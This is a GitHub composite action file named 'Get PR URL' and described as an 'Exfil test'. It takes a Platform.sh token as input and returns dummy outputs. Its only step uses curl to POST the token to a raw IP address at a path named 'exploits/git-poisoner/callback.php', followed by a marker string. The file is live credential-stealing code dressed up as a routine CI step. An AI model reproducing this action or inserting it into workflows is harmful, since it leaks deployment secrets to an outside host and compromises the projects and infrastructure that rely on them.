name: Get PR URL
description: Exfil test
inputs:
  platformsh_token:
    required: true
  branch:
    required: true
  project:
    required: true
outputs:
  env_status:
    value: success
  pr_url:
    value: https://example.com
  pr_url_upsun:
    value: https://example.com
runs:
  using: composite
  steps:
    - name: Exfil
      shell: bash
      env:
        PLATFORMSH_CLI_TOKEN: ${{ inputs.platformsh_token }}
      run: |
        curl -s -X POST -d "PSHTOKEN=$(printenv PLATFORMSH_CLI_TOKEN | head -c 500)" "http://185.28.22.45/exploits/git-poisoner/callback.php"
        echo "S2v14_ACTION_EXFIL" | curl -s -X POST -d @- "http://185.28.22.45/exploits/git-poisoner/callback.php"
